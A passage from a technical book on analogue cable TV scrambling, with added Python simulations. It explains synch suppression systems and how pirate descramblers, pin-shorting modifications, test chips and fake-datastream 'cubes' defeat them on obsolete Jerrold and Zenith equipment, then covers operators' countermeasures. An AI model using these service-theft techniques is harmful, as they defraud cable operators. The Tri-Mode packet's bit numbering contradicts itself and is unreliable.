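    return (1.0 - e) / 0.9


def gain_wave(n, depth, phase=0.0):
    """Line-frequency sine wave gain for sample n, phased so that its
    minimum (1 - depth) falls on the synch pulse when phase is 0."""
    return 1.0 - depth * (1.0 + math.cos(2 * math.pi * n / SAMPLES + phase)) / 2.0


def scramble(line, depth=0.5):
    """Apply the sine wave to the RF envelope via a variable gain amplifier."""
    return [gain_wave(n, depth) * to_envelope(v) for n, v in enumerate(line)]


def descramble(envelope, depth=0.5, phase=0.0):
    """Reciprocal gain: multiply the envelope by 1/gain using the same
    sine wave. No demodulation of the video is needed."""
    return [e / gain_wave(n, depth, phase) for n, e in enumerate(envelope)]


def demodulate(envelope):
    """Baseband line as a television receiver would see it."""
    return [from_envelope(e) for e in envelope]


def synch_tip_level(demod):
    """Lowest level inside the synch window of a demodulated line."""
    return min(demod[:SYNC_END])


def tv_can_lock(demod):
    """A receiver locks when the lowest point of the line is the synch
    pulse and it sits clearly below blanking level."""
    tip = min(demod)
    return demod.index(tip) < SYNC_END and tip < BLANKING - 0.1


def demo():
    clean = video_line()
    scrambled = demodulate(scramble(clean))
    restored = demodulate(descramble(scramble(clean)))
    # Same waveform but the wrong phase: the gain is not reciprocal.
    wrong_phase = demodulate(descramble(scramble(clean), phase=math.pi))
    return {
        "clean_locks": tv_can_lock(clean),
        # the synch tip is attenuated AND shifted up into the video region
        "scrambled_tip": synch_tip_level(scrambled),
        "scrambled_locks": tv_can_lock(scrambled),
        "restored_locks": tv_can_lock(restored),
        "wrong_phase_locks": tv_can_lock(wrong_phase),
        "max_error": max(abs(a - b) for a, b in zip(clean, restored)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The scrambled synch tip lands above blanking level, which is why an RF gain scheme is described as suppression once demodulated, and the restored line matches the original only when the regenerated sine wave has the right phase.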


The commonest implementations of synch suppression scrambling systems 
on cable are sine wave synch suppression and pulse synch suppression. 


It should be stated that synch suppression scrambling is not permitted in 
some European countries. Synch suppression is an antiquated form of 
scrambling that can easily be overcome. A cable company that chooses this 
type of scrambling would be taking a severe risk. It has to choose between 
a cheap and reliable scrambling system that will have piracy and will quickly 
repay the investment or a more expensive system that will have a reduced 
risk of piracy but will take longer to pay back the investment. 
Sine Wave Synch Suppression 


Sine wave synch suppression is ideally suited to cable television scrambling. 
It can either be applied to the signal at baseband or to the transmitter 
amplifier. The transmission mode for terrestrial television is amplitude 
modulation. (For the purists - Vestigial Sideband.) 


The commonest method of applying the sine wave to the signal is via a 
variable gain amplifier at the IF stage. The scrambled signal is then 
translated to the transmission frequency. 


This sine wave cannot be removed from the demodulated signal by a clamp 
in the way that the dispersal waveform is removed from the video of a 
satellite broadcast. 


The frequency of the sine wave can either be line frequency or a multiple of 
the line frequency. The wave is phased so that in baseband it has the 
appearance of pushing the line synch pulse up in to the video region of the 
signal. (Note: Positive going video and negative going synch waveform used 
for example.) Again it should be remembered that this is an RF system and 
it is descrambled using RF techniques. Considering it in terms of hacking 
the signal at baseband is misleading. 


With some systems, the sine wave is switched off during the vertical 
blanking interval. This causes the frame to lock on the television but there is 
no line lock. To complicate matters further, the video can be inverted and or 
reduced in amplitude. The reduced amplitude option is rarely used due to 
the complications that it can cause. 


There are a number of ways to descramble such a signal. All of them rely on 
detecting the sine wave and using it to control the gain of a variable gain 
amplifier. 


The official decoders generally use a sine wave transmitted on either the 
audio subcarrier or a separate subcarrier. The actual sine wave is amplitude 
modulated on to the FM carrier. The level of the sine wave on the audio 
subcarrier is very low so it is affected by any limiting circuit in the television 
receiver. The separate subcarrier can be near to the channel or it can be in 
a totally different band. It is the more secure of the two. 


The procedure used for hacking such a system is relatively straightforward. 
Of course much of the following can be eliminated by simply finding the type 
of system in operation. This would allow a hacker to streamline the 
approach. 
1. Establishing The Sine Wave Frequency 


The first step is to identify the kind of system in use. This means 
establishing the approximate frequency of the sine wave. The simplest 
method of doing this is to examine the RF signal at the IF frequency, if the 
oscilloscope is fast enough, or at baseband if the oscilloscope is not that 
fast. 


Most systems employ a line frequency sine wave, though some will use a 
sine wave at twice or three times the line frequency. This means that it is not 
exactly a difficult task. 


2. Finding The Sine Wave 


Because sine wave synch suppression scrambling is such an old technique, 
it is often best to use exactly the same method that the official descrambler 
uses to decode the signal. Of course in order to do this, it is necessary to 
find the sine wave that the official descrambler uses to descramble the 
signal. 


There are generally two areas for the sine wave to be found: amplitude 
modulated on to the FM audio subcarrier or on a separate RF carrier. 


The raw FM audio subcarrier is then fed to the oscilloscope. This test will 
determine if the system uses a separate subcarrier for the decoding signal. 
This audio subcarrier must not be FM limited as the descrambling waveform 
is often amplitude modulated on to the FM subcarrier. 


If the sine wave was not present on the FM audio subcarrier, then it is 
necessary to scan the cablenet's spectrum for the RF carrier. This is not as 
complex as it seems. Basically, an RF scanner is connected to the cable 
outlet. The audio output from the scanner is then connected to an 
oscilloscope. By stepping through the frequencies, it will be possible to 
detect the carrier used. 


3. Regenerating The Sine Wave 


If the sine wave cannot be detected by the above techniques, it is possible 
that the system regenerates the sine wave in the descrambler. This is not, 
as it might seem, that complex. 


The interfering sine wave has to be stripped and antiphased for cancellation. 
The frequency of the interfering sine wave will commonly be higher 
than that of the line frequency. The official descrambler would not use 
filtering to remove a line frequency sine wave though there are probably 
exceptions. An official descrambler would use a phase locked loop to 
descramble the signal. This method is a very costly and very effective 
method of descrambling. A typical hacker design would use a high Q filter, a 
phasing network and a variable gain RF amplifier for cancellation. 


If the sine wave is present on the FM audio subcarrier it must be stripped off 
with an AM demodulator. Alternatively, if the sine wave is present on a 
separate subcarrier it must be demodulated and filtered. The separate 
subcarrier could be very close to the channel and so it may be present in the 
IF output of a tuner tuned to the scrambled channel. 


On most cablenets, the channels are genlocked. This means that the 
synchs on all channels are in phase. The reason for this is largely for the 
reduction of interference but in this case it has an added advantage: only 
one reference sine wave is needed. 


4. Decoding The Signal 


One of two methods is used to descramble the video signal; baseband 
antiphasing or RF antiphasing. RF antiphasing involves feeding an 
antiphased sine wave to a variable gain amplifier. This produces the best 
results on the descrambled picture. 


Antiphasing at baseband does not produce the best quality. It can cause 
tearing on peak whites and on saturated colours. Of course it also requires 
the signal to be demodulated and processed. 


Pirate Sine Wave Descramblers 


The difference between a pirate Sine Wave Synch Suppression descrambler 
and an official one is simple. The pirate device does not have any 
access control circuitry. Why reinvent the wheel? 


The descrambling in this design takes place at the Intermediate Frequency. 
This allows the overall design of the decoder to be drastically simplified. It 
becomes effectively two distinct sections with minimal data being 
exchanged between the two modules. This of course has the added 
advantage of allowing the circuitry of each section to be hardened against 
hacking. 


One of the better examples of this can be seen in the official Jerrold 
Starcom descramblers where the RF descrambling section is blobbed in a 
ceramic like package. The term for this type of circuit is a thick film circuit. It 
allows the design to be repeated with minimal tuning as the components are 
a combination of surface mount devices and resonant copper tracks. 


The front end of the descrambler is effectively an RF tuner. The channel to 
be descrambled is selected by the tuning voltage on the tuning pin. This 
tuner translates the selected channel to the IF frequency. In the US pirate 
designs of the mid eighties, the tuner output was modified so that the IF 
output was in the region of US Channel 3 (61.25 MHz). 


The fact that the channel was converted down to 61.25 MHz meant that 
ordinary television receiver IF circuitry could be used as the channel 
frequency is near to the typical television IF frequency. 


One of the more primitive designs for a sine wave descrambler (covered in 
the Pink And Brown Book) was based on an IF amplifier, a video 
demodulator and a sine wave demodulator/filter. It took the demodulated 
video signal from the MC1330 demodulator and fed it directly into a 15 kHz 
Op-Amp based amplifier / filter circuit. This relied on the fact that the filter 
would only pick out the relatively low frequency 15 kHz sine wave from the 
composite video signal, thereby acting as an AM demodulator. This Op-Amp 
stage was then followed by an amplifier stage and Op-Amp filter. 


The output from the Op-Amp filter was used to control the gain of the first 
stage IF amplifier. The output of the second IF amplifier was fed to an 
impedance matching transformer. 


The design in the Cable And Satellite Descrambling book by Sheets and 
Graff (Sams 1986, ISBN 0-672-22499-2) used a similar approach but used 
a single stage Op-Amp filter and used a PIN diode circuit to effect the RF 
gain control. 


In both of these designs, the essential element was that the signal had been 
downconverted to roughly 61.25 MHz (US Channel 3). This ordinarily would 
require a tuner front end. It is this that tends to make the hardware 
modifications to the official descramblers a more attractive option. 


Pulse Synch Suppression 


The pulse synch suppression technique is perhaps easier to hack than 
the sine wave synch suppression. The pulse synch suppression technique 
is only applied to the synch section of the line whereas the sine wave 
method has an effect on the whole line. 


Commonly, the suppression is not applied to the vertical synch. This is why 
the television receiver will be able to achieve vertical lock while not 
achieving horizontal lock. Of course with the increasing sophistication of 
television design, manufacturers of pulse synch suppression systems were 
faced with the situation that some of the synch circuitry used in television 
receiver designs could lock up the horizontal by using the frame synch. This 
forced the systems manufacturers to introduce refinements such as 
tri-mode. 
The descrambler for pulse synch suppression is again largely similar to that 
used for the sine wave suppression. Except in this case, the suppression is 
pulse based. Therefore a synchronising pulse stream is transmitted 
somewhere in the signal. 


The commonest place for the synchronising pulse stream was the FM audio 
subcarrier. It would be amplitude modulated on to this FM carrier. The 
alternative to the AM on FM synch signal was to include an ultrasonic (31.25 
kHz or 62.5 kHz) pulse stream with the audio. 


In the descrambler, this pulse stream would be demodulated, rephased and 
used to control a variable gain RF amplifier. The whole descrambling 
procedure could be carried out at RF as opposed to baseband thereby 
lowering the cost of the descrambler. 


On some of the older designs, a separate FM synch carrier was used. This 
would be transmitted separately, often away from commonly used television 
channels. Again the emphasis was on low descrambler cost. It also made 
things a lot easier for the hackers in that it was simply a case of detecting 
this carrier with a scanner and then designing a simple RF receiver to 
recover the pulse stream and rephase it for use with a variable gain 
amplifier. 


This type of out of band synch carrier made the overall design of pirate 
descramblers easier. As a result most of the cablenets using this kind of 
scrambling system eventually opted for the more secure forms of 
synch suppression scrambling. The more secure form involved variable 
levels of synch suppression. 


Pirate Pulse Suppressed Synch Descramblers 


The out of band pulse synch suppressed systems were the easiest to hack 
in that they only required the detection of the synch carrier signal. Again the 
same approach of the IF amplifier and video demodulator is used. The 
output of the video demodulator is essentially a synch carrier that is used to 
control a PIN diode circuit. 


The in-band form of pulse suppressed synch system is slightly harder to 
hack. The synch carrier is amplitude modulated on to the FM audio 
subcarrier. As a result, this approach requires the AM signal to be detected. 
This is achieved by using a video demodulator tuned to the FM audio 
subcarrier frequency. 


Once this synch signal is recovered, it is generally fed to a rephasing circuit. 
The rephasing circuit is typically based on 4528 / 4098 monostables as 
detailed in chapter 3. Sometimes a 4046 PLL is included to provide more 
stability. 


The reconditioned synch signal is used to control the gain of an IF amplifier 
or a PIN diode circuit like the previous descrambler designs. Of course this 
type of approach is limited to one level of synch suppression only. Tri-Mode 
synch suppression went some way towards stopping this simplistic hack. 


Tri-Mode 


The Tri-Mode system was developed and patented by Jerrold. Other 
manufacturers, such as Scientific Atlanta use this system's scrambling and 
access control system under licence. This has given rise to the term “multi 
vendor compatibility”. This means that a Jerrold descrambler can be used, 
with the proper authorisation codes on a cablenet that employs the Scientific 
Atlanta Tri-Mode system. 


The tri-mode pulse suppression method of scrambling is one of the 
standard methods used in the US and Europe. It is often billed as being 
highly secure. The reality is that the method is far from secure and articles 
on how to hack it have been widely published in the US. Radio Electronics 
published a complete design along with printed circuit board layout for this 
system in the February 1987 issue. Luckily for the system owners in 
Europe, very few cable hackers have read the American article. 


Hacking the Jerrold Tri-Mode system in this fashion is difficult and time 
consuming. Given the breadth of the modifications for the official 
descramblers, attacks on the scrambling system itself are becoming rare. 


The system relies on attenuating the horizontal blanking section of the line 
by 0dB, 6dB or 10dB. This is achieved by a variable gain amplifier operating 
at RF. By using this method of applying the suppression, it simplifies the 
descrambler design in that the signal does not have to be demodulated. In 
the 0dB mode there is no attenuation and the picture is effectively clear. 


The synch signal is amplitude modulated on to the FM audio carrier. In 
addition to the synch information, the carrier includes data that indicates the 
attenuation mode in use. The information here has been synthesised from a 
number of American sources. Before the manufacturers of this system start 
whinging that I am divulging top secret information, I should say that the 
main source of information was the article in Radio Electronics. Therefore 
this information is from openly published sources. 


In the NTSC system, the first 20 lines or so of each field are unused. The 
tri-mode system uses these line positions to carry data. The data is carried 
on the synch carrier rather than in the video. The data is a 17 bit packet. Each 
bit of the packet is inserted in the video space in the synch train. In the 
NTSC system, the data bit starts 20 µs after the rising edge of the synch 
pulse. Bits 0 to 8 carry the programme authorisation data. Bits 8 to 15 carry 
the descrambler enable codes. The bits 12 to 15 carry the scrambling 
codes. The 0dB code is 0010. The 6dB code is 1000. The 10dB code is 
0100. The states of these four bits are continually changing. This is a 
security measure that has been reasonably successful. 


The key to the system is the detection of the state when all bits 12 to 15 are 
logic 1. This is the identifier. The state prior to this state is the scrambling 
mode in use. This hack requires sequential and combinational logic to 
execute. 


The descrambler for this system is RF rather than baseband orientated. 
When a signal is demodulated it is clamped. Since the television receiver 
uses the blanking levels for clamping it is obvious that the result will be an 
unmitigated mess. The approach used in the official and the hacker 
descramblers is to demodulate the data and the synch carrier and use 
gated RF amplifiers to descramble the RF. The descrambled data would 
then be fed to the television receiver. 


The system is an antique and is not very popular in Europe as it is not 
transparent in the way Cryptovision and VideoCrypt are. Both of these 
systems can be accessed via the SCART connector on the television. The 
main factor that appears to have limited the piracy on the system when it 
was used in Europe is the cost of the RF section involved. 


To actually descramble the signal, a cable tuner with a standard TV IF 
output has to be constructed. Using a standard wideband tuner this would 
cost about £30.00. The descrambler section must then be constructed for a 
cost of about £30.00. The total cost for the hacker descrambler would 
approach one hundred pounds or so. 


One rumour from a cablenet where a tri-mode scrambling system was used 
reflected a serious lack of security on the part of the system owner. The 
reason why there was no piracy was that there were no pirate descramblers 
only modified official ones. When subscriptions had expired, the cable 
company had not repossessed the descramblers. Someone had figured out 
how to hot wire the descramblers. 


It is not known if the compromised cablenet actually employed any 
consultants to ascertain the most logical choice of systems. The system 
was probably chosen because of its subscriber management capability. 
Other Hacks On Tri-Mode 


Building a pirate descrambler for a cable system is hard work. It is 
especially futile when there are so many potential pirate descramblers 
available. In a cablenet where there is blanket scrambling, each and every 
official descrambler is a potential pirate device. This of course is a rather 
piratical viewpoint. 


With this in mind, many of the US cable system hackers of the mid and late 
eighties drifted away from the idea of manufacturing pirate descramblers. 
To get into manufacturing cable descramblers would be similar to 
reinventing the wheel. Of course there was always the problem of distribution. 


This move away from pirate descramblers towards the modification of 
official descramblers quickly produced results. The designs of the official 
descramblers left a lot to be desired in terms of security. It seems as if the 
designers were more intent on making the scrambling technique too difficult 
to hack. As a result, they made some very stupid mistakes in the security 
architecture of the official decoders. The first hacks directed at the official 
descramblers were as simple as shorting some pins and cutting PCB 
tracks. 


The main reason for the simplicity of these hacks was the simplicity of the 
descrambler's security architecture. Well, the term "security architecture" 
might be stretching things a bit too far. The architecture was far from 
secure. 


Citizens Band Radio was an interesting diversion for the technically minded 
in the early eighties. The CB radios always had to follow the FCC channel 
specification. Most of the units that ended up in Europe were modified as a 
matter of course. After a while, a whole industry devoted to modifying these 
radios to either operate on more channels or produce more power sprung 
up. The initial hacks were based on shorting out various pins and cutting 
tracks. The PLL frequency synthesisers were not that complex. Some of 
them were capable of being modified by additional EPROMs and logic 
gates. The connection with cable scrambling is that the same techniques 
used to modify CB radios were applied to the cable scrambling systems with 
similar good results. 


Much of the information on the hacking of Tri-Mode seems to be American 
in origin. This is logical considering that it is primarily an American system 
though it is popular on some of the smaller cablenets here in Europe. The 
majority of these nets use more recent systems such as Cryptovision, 
Syster and Discret. 
However the fact that there is a considerable amount of American hacker
literature and devices available for the Jerrold Tri-Mode indicates that the
system is not secure. It remains to be seen, however, if these techniques will
readily translate to the European implementations of the system. Considering
that the main difference between the European implementations and
the American implementation is the television standard, (PAL vs NTSC),
there is a probability that the main security architectures of the Jerrold
Tri-Mode descramblers are identical to their American variants.


On the Tri-Mode Jerrold 450 series, the full service modification was as 
simple as shorting pin 2 to 3 and pin 13 to 15 on the digital descrambler 
board. However modifications based on the principle of shorting out 
connections were quickly discovered and more secure versions of the 
descramblers were implemented. Apart from the star type screws that
require a custom screwdriver or a small pair of cutters, elements such as
anti-tamper switches were incorporated into the design.


As the level of the descrambler security increased, the hackers’ knowledge 
followed. Since the simple jumper modifications were no longer an option, 
the hackers went after the access control data. This was the advent of the 
test chips. 


The Jerrold Starcom 6 test chip was an EPROM based hack. It involved 
replacing the official EPROM, which was in a DIL socket on some models. 
This alternative EPROM was referred to as a Test Chip as it opened all
channels on a descrambler.


The test chip for the Jerrold Starcom 7 was based on a programmable logic 
array, a GAL22V10. It took the form of a small PCB carrying the PLA that 
was soldered over the descrambler's EPROM and connected to the
descrambler's RAM. Other more innovative versions involved the use of a 
test clip. 


The problem with the hacks described above is that they all require 
hardware modifications to the actual circuitry of the descrambler. This 
means that they can only be carried out by someone with technical 
knowledge and as such are not widely marketable. This is the point where the
situation changes from pure hacking to piracy. In order for a pirate device to 
become marketable, it has to be usable by people without any real technical 
knowledge. To use an expression from the computing business, it has to be 
"Plug and Play". 
Cubes


They were black, they were potted in epoxy resin and they were shaped like 
cubes. The name stuck. These devices were the forerunners of the Phoenix 
programs used on the smart card systems. Basically put, the cubes blocked 
the official access control datastream and flooded the descrambler with a 
fake datastream that authorised it for all channels and services. The
beauty of this hack was that it was a soft hack. Remove the cube and the
descrambler would soon return to its previous status. Above all it did not 
require any hardware modifications to the descrambler's circuitry. 


The American variants of the Jerrold system generally transmit their access
control datastream at 97.6, 106.5 and 108.5 MHz. One European variant 
transmits the datastream at 122.75 MHz. The first part of the cube is a 
notch filter to remove this datastream. Some models of the cube actually 
use a high enough level of RF to flood the descrambler so that the notch 
filter is not necessary. It is not a particularly elegant solution but then the 
main thing is that it worked. 


The access control datastream carries its data at approximately 14 KHz,
using Manchester encoding. The modulation method is frequency shift
keying (FSK).
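Manchester coding, as an added illustration of the line code named above (this is example code written for this edition, not a listing from the book or from any Jerrold design): a self-clocking code in which every bit cell carries a mid-cell transition, so a receiver can recover its clock phase from the data and can recognise corruption as a coding violation. The bit-to-level convention and the sample frame are assumptions made here; the book does not state which convention the datastream uses.

```python
"""Manchester (bi-phase) line coding as used by the access control
datastream described above. Added example, not code from the book.
Convention assumed here (the book does not state which one the Jerrold
stream uses): a 0 bit is low-then-high, a 1 bit is high-then-low, so every
bit cell has a transition at its midpoint and the clock can be recovered
from the data itself."""

HALF_CELLS = {0: (0, 1), 1: (1, 0)}  # data bit -> (first half, second half)


def manchester_encode(bits):
    """Expand each data bit into two half-cell levels."""
    levels = []
    for b in bits:
        levels.extend(HALF_CELLS[b])
    return levels


def manchester_decode(levels):
    """Recover data bits from an even-length list of half-cell levels.

    Returns (bits, violations). A pair with no mid-cell transition (00 or
    11) can never be produced by the encoder, so it is reported as a coding
    violation: the receiver's cue that the stream is corrupted or that it is
    sampling with the wrong clock phase."""
    if len(levels) % 2:
        raise ValueError("need an even number of half-cells")
    bits, violations = [], []
    for i in range(0, len(levels), 2):
        pair = (levels[i], levels[i + 1])
        if pair == (0, 1):
            bits.append(0)
        elif pair == (1, 0):
            bits.append(1)
        else:
            bits.append(None)
            violations.append(i // 2)
    return bits, violations


def align_and_decode(levels):
    """Clock-phase recovery: try both half-cell phases and keep the one with
    the fewest coding violations. Returns (bits, phase, violations)."""
    best = None
    for phase in (0, 1):
        window = levels[phase:]
        if len(window) % 2:
            window = window[:-1]
        bits, violations = manchester_decode(window)
        if best is None or len(violations) < len(best[2]):
            best = (bits, phase, violations)
    return best


def half_cell_us(bit_rate_hz):
    """Half-cell duration in microseconds; at the ~14 KHz quoted in the text
    each half-cell lasts about 35.7 us."""
    return 1e6 / (2 * bit_rate_hz)


if __name__ == "__main__":
    frame = [1, 0, 1, 1, 0, 0, 1]          # constructed sample bits
    line = manchester_encode(frame)
    print("levels:", line)
    print("in phase:", manchester_decode(line))
    print("off by one half-cell:", align_and_decode(line[1:-1]))
```

Feeding the decoder a stream that starts half a cell late produces violations in almost every cell, which is exactly how `align_and_decode` tells the two phases apart; a stream with occasional violations in an otherwise aligned phase indicates corrupted cells rather than a phase error.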


As can be seen from the number of datastream frequencies in use, cubes 
had, initially, to be tailored for the particular cablenet. This somewhat limited 
their usability. The first designs were based on single crystal designs. More 
advanced models used a synthesizer. The Group 42 solution was to use a 
crystal based modulator with enough harmonics to hit all of the Jerrold 
frequencies. The main encoding and data generation is taken care of by a 
PIC16C54 running at 8 MHz. The output of the PIC16C54 is then used to 
pull the frequency of a crystal oscillator, (8 MHz for Jerrold, 11 MHz for 
Pioneer descramblers), using a varicap circuit. The oscillator is divided down
to 500 KHz by a 74HC4060. The resultant 500 KHz signal is then fed to the 
descrambler via an F-Connector. The voltage at the output is approximately 
5 Volts. This square wave signal produces harmonics that are high enough 
in level to over-ride the official datastream. 


To date, cubes have been rare in Europe as most of the hacking seems to 
be aimed at satellite based transmissions rather than cable. However there 
were rumours of test chips, cubes and hardware modifications on the Cork 
cablenet in Ireland. 
The Group 42 Cube design uses a PIC16C54 to generate a datastream with the relevant turn-on
instruction for the decoder ID. This datastream is fed to an FSK modulator comprised of the
varicap and the crystal circuit. The 74HC4060 then divides the FSK datastream down to around
500 KHz. The theory is that the harmonics will occur on the datastream frequencies of the
decoders. For Jerrold decoders, an 8 MHz crystal is used and for the Pioneer decoders, an 11
MHz crystal is used. European operation requires different frequency crystals.


This design is not the most technologically elegant in that it floods the decoder with RF. More 
advanced designs incorporated a filter arrangement that would notch out the official 
datastream carrier and then would allow the Cube's datastream to replace it. 


This is a transparent hack. If it is removed then the decoder will revert to its initial state as it 
will not receive the necessary heartbeat signal from the headend. 
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ө Cablenet Countermeasures 


The cablenets are not as simple a target as satellite channels. Indeed there 
is often very strong anti-piracy legislation that covers cable hacking in 
Europe. This of course does not mean that they will limit their actions to 
legal proceedings against the hackers and pirates that they catch. They will 
often implement countermeasures on their own cablenets. 


The obvious method of detecting an illegal connection on a cablenet is to 
look for the unauthorised connection. This can be as simple as looking for a 
cable on the front of a house that should not be there. 


A more subtle, and perhaps more effective, method is to use time domain 
reflectometry. This is where a pulse of a known level and duration is sent 
down a cable. The echo should have known characteristics relating to the 
length of the path and the impedance. When an unauthorised connection is 
made, the shape, level and timing of the echo differ from those
expected. This form of piracy detection seems to be commoner in the US
than in Europe. 
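The baseline-comparison logic behind this detection method, as an added example (written for this edition, not code from the book or from any cable operator's equipment): a simplified lossless model in which each impedance discontinuity on a 75 ohm line returns one echo, a commissioning trace is stored, and a later trace is compared against it so that any new echo is reported together with the distance to the discontinuity. The cable length, velocity factor and the bridging tap are constructed values.

```python
"""Time domain reflectometry (TDR) for spotting an unauthorised tap on a
coaxial drop, as described above. Added example, not code from the book.
Simplified lossless model: a unit step is launched into a Z0 = 75 ohm
line, every impedance discontinuity returns a single echo with amplitude
Gamma = (ZL - Z0) / (ZL + Z0), and attenuation and multiple reflections
are ignored. Cable length, velocity factor and the tap are constructed
values for the demonstration."""

C = 299_792_458.0  # speed of light, m/s


def reflection_coefficient(z_load, z0=75.0):
    """Voltage reflection coefficient of a discontinuity seen from Z0."""
    return (z_load - z0) / (z_load + z0)


def parallel(z1, z2):
    """Impedance of two loads in parallel (a tap bridges the line)."""
    return z1 * z2 / (z1 + z2)


def round_trip_ns(distance_m, velocity_factor):
    """Time for the pulse to reach a point and for its echo to return."""
    return 2.0 * distance_m / (velocity_factor * C) * 1e9


def distance_from_delay(delay_ns, velocity_factor):
    """Inverse of round_trip_ns: locate a reflection along the cable."""
    return delay_ns * 1e-9 * velocity_factor * C / 2.0


def simulate_tdr(length_m, velocity_factor, z0=75.0, taps=(), end="matched"):
    """Echo list [(delay_ns, amplitude)] for the modelled cable.

    taps: iterable of (distance_m, tap_impedance_ohm); a drop tapped onto the
    line presents Z0 in parallel with the tap, i.e. a step down in impedance
    and therefore a negative-going echo."""
    echoes = []
    for distance, z_tap in taps:
        gamma = reflection_coefficient(parallel(z0, z_tap), z0)
        echoes.append((round_trip_ns(distance, velocity_factor), gamma))
    end_gamma = {"matched": 0.0, "open": 1.0, "short": -1.0}[end]
    if end_gamma:
        echoes.append((round_trip_ns(length_m, velocity_factor), end_gamma))
    return sorted(echoes)


def new_reflections(baseline, measured, velocity_factor,
                    delay_tol_ns=2.0, amp_tol=0.05):
    """Compare a fresh trace against the commissioning baseline and report
    every echo that was not there before, with the distance to the fault.
    The tolerances absorb timebase jitter and small level drift."""
    found = []
    for delay, amp in measured:
        known = any(abs(delay - d0) <= delay_tol_ns and abs(amp - a0) <= amp_tol
                    for d0, a0 in baseline)
        if not known:
            found.append({
                "delay_ns": round(delay, 1),
                "gamma": round(amp, 3),
                "distance_m": round(distance_from_delay(delay, velocity_factor), 1),
            })
    return found


if __name__ == "__main__":
    VF = 0.85  # constructed velocity factor for a foam-dielectric coax
    baseline = simulate_tdr(120.0, VF, end="open")                   # drop as commissioned
    now = simulate_tdr(120.0, VF, taps=[(40.0, 75.0)], end="open")   # 75 ohm tap at 40 m
    for hit in new_reflections(baseline, now, VF):
        print("new reflection:", hit)
```

A 75 ohm drop bridged onto the line presents 37.5 ohms at that point, giving an echo of about one third of the pulse amplitude and of negative sign; the delay-to-distance conversion depends on knowing the cable's velocity factor, which is why the baseline is taken on the installed cable rather than from a data sheet.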


Cable company executives tend to speak in glowing terms of Bullets. These 
bullets are sent down the cable with the aim of killing the pirate 
descramblers. It is all part of the macho mumbo-jumbo so beloved of those 
who sit behind a desk all day shuffling papers. The truth, somewhat like the 
cable executives, is more mundane. 


A bullet is a kill signal received and acted upon only by the pirate 
descramblers on the cablenet. The legitimately authorised descramblers do 
not receive the kill signal. 


In order to implement a bullet, the cablenet must shut down all the legitimate 
descramblers on the net. It then sends a kill signal to all of the descramblers 
still in operation. The logic being that the descramblers still in operation will 
be pirate devices. Then they just wait. 


Soon the phone calls will start coming in. These will mainly come from 
people complaining of loss of service. The majority of these people will have 
been using a descrambler that has been hit by the bullet. Commonly it will 
be the people in the household who are not clued up on the fact that the 
descrambler is a pirate device. Depending on the complexity of the bullet, 
some pirate descramblers will have to be reactivated by the hacker who 
carried out the original modification. 


The word “free” is the one thing that most people respond to. Knowing this 
elementary piece of psychology allows the cablenet to implement some 
nasty ECMs. While these ECMs are not totally electronic, they are very
effective though they can misfire. 


The commonest form of this ECM is the “Free Tee Shirt” sting. During
some event that the cablenet knows will have a very high audience level, the 
cablenet will switch the officially authorised descramblers to another 
channel. The user will be oblivious to this little switch. It will generally 
happen during the advert break.


Since the pirate devices are ignoring the official datastream, they will 
continue on the same channel. An advert by some company promising a 
free tee-shirt for the first N hundred callers will be screened. It will only be 
seen on the pirate descramblers and in all probability it will be attractive to 
children. When the advert is over, the cable headend will instruct the official 
descramblers to switch back to the original channel. Again the only thing 
that the cablenet has to do is to wait for the pirate descrambler users to call 
in for their free tee-shirt. 


Of course such stings do not always run smoothly. In one such sting in 
Ireland a few years ago, the advert was seen and details were spread by 
word of mouth. The cablenet got more people calling in for their free 
tee-shirt than they expected. Many of them did not even have descramblers, 
pirate or official. This was of course a bit of a legal problem when some 
raids were carried out. 


Baseband Systems


The RF based techniques were economical in terms of descrambler unit 
cost. However they did not offer enough security. This fact was painfully 
brought home to management of large cablenets. The fact that the RF 
techniques were also nearly fifteen years old is also a factor in the falling 
level of security that they offer. The solution, for many of the cable systems 
manufacturers was to go for baseband scrambling techniques. 


The beginnings of the move away from RF based techniques started in the 
mid eighties with systems like the Zenith SSAVI and VideoCipher II in the 
USA and with systems like Discret here in Europe. 


Zenith SSAVI 


The Zenith SSAVI system is also used, and manufactured under licence, in
Europe. SSAVI is an acronym for Suppressed Synch and Video Inversion. It
is a relatively old system and there are hardware modifications that will open
the official descrambler for all channels. A pirate descrambler however is a
more complex project than the simple suppressed synch systems as it is
necessary to demodulate the video and take the data for descrambling the
signal directly from the VBI.


In the American variant of this system, the subscriber authorisation data is 
transmitted on lines 10, 11, 12 and 13. Each descrambler contains an 
identity stored in RAM. The system operates on an inclusion principle so the 
descrambler must receive a heart beat signal periodically or it will shut 
down. 


As with most other systems that use suppressed synch as a scrambling 
technique, the vertical interval is untouched. This allows the official 
descrambler to obtain the necessary data and levels to descramble the 
signal. This, while allowing the official descramblers to resynchronise and 
descramble, also allows the pirate descrambler designs to do likewise. 


The pirate descramblers use a PLL running at 32 times the horizontal 
refresh rate. This provides adequate stability for regenerating the synch 
pulses. The best example of this kind of PLL synch regeneration circuitry 
can be found in the FilmNet SATPAC PLL descrambler case study in 
chapter 3. Admittedly it would have to be slightly modified for this system. 


The SSAVI system allows for five levels of scrambling:

Suppressed Synch and Pseudo Random Video Inversion
Suppressed Synch and Average Peak Level Video Inversion
Suppressed Synch and Normal Video
Normal Synch and Pseudo Random Video Inversion
Normal Synch and APL Video Inversion

Ten or so years ago, these techniques were unusual and for some,
downright scary. Of course with the expertise on analogue satellite hacking,
which is baseband, they are not really much of a challenge.


The video inversion is flagged. In line 19 of the NTSC signal, the Vertical
Interval Colour Reference signal is transmitted. This consists of a
chrominance reference bar, a luminance reference level and a black
level reference. By comparing the voltage level of the luminance reference
with that of the black level reference it was possible to ascertain whether
the video in the subsequent lines was inverted or normal. The video
inversion was field based.


However the main problem with most of the pirate descrambler designs was 
that they required a Zenith tuner as the front end. Effectively they would 
have the guts of a television receiver less the display circuitry. It was an 
expensive and complex hack. The hacker solution, as with the Jerrold 
system, was geared towards modifying the official descrambler to operate in
a piratical manner. 


Many of the early modifications were based on shorting or cutting tracks. As 
the complexity of the situation increased, the hackers had to use Test Chips 
and other hacks. 


Orion Irdeto CableCrypt 


The previous system, SSAVI, is primarily an analogue system that does not 
replace the synch pulses. The Orion, IRDETO and CableCrypt systems 
however do replace the synch pulses with digital data. 


The video is not strongly scrambled on the above systems and it is relatively 
easy for a satellite hacker to build a video only decoder. However the digital 
audio is a completely different problem. 


The digital audio is the particular strength of the ORION, IRDETO and CableCrypt
systems. It is not an economical hack for someone to make a pirate digital 
audio decoder for these devices. The key to hacking these systems lies in
